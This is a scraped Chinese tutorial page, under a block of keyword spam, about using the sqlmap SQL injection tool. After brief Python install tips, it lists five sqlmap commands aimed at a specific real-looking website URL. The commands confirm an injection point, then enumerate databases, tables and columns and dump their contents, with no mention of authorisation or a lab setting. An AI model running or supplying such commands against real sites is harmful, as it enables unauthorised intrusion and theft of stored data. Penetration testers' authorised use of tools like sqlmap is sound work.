GraphQL Markdown编辑器 gps 哨兵模式 websocket pagination jqgrid vue基础教程 vue实现原理 sketch up教程 oracle查看数据库状态 idea导入多个项目 mser算法 python循环 java循环语句 java连接mysql的jar包 行业软件下载 黑帮之地修改器 脚本软件 东方头条邀请码 python输入数字 免费书籍 魔兽七个人 go2lan js代码混淆工具 网红照片男 文件分割 数据库建模工具 趣学python编程 深度学习pdf rdpwrap vue搭建项目 101图集电子版 ghost一键还原 血液锦标赛 刺客加点 nwiz 黑色火山怎么打 角标怎么打 微信点击文字跳转链接
当前位置: 首页 > 学习教程  > 编程语言

sql神器--SQLMAP

2020/8/11 18:49:54 文章标签:

sqlmap 是一个基于命令行的半自动化sql注入攻击工具,成功执行sqlmap,需要安装python(建议用python2)+sqlmap

---自动百度安装

tip:

1、python安装后,设置系统环境变量--path,最终cmd下输出python后有输出即可。

2、sqlmap直接安装到python目录下(例如直接解压到D:/Python27),生成--sqlmapproject-sqlmap-5650abb,

cmd下执行后有如下图展示,代表成功

开始sql注入尝试

1、扫描站点是否存在注入漏洞

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"

---存在注入点

2、扫描数据库

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  --dbs

3、扫描数据库表

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  --tables

4、扫描字段名

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  -T 表名  --columns

5、获取字段内容

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  -T 表名  -C 字段值  --dump


本文链接: http://www.dtmao.cc/news_show_100034.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?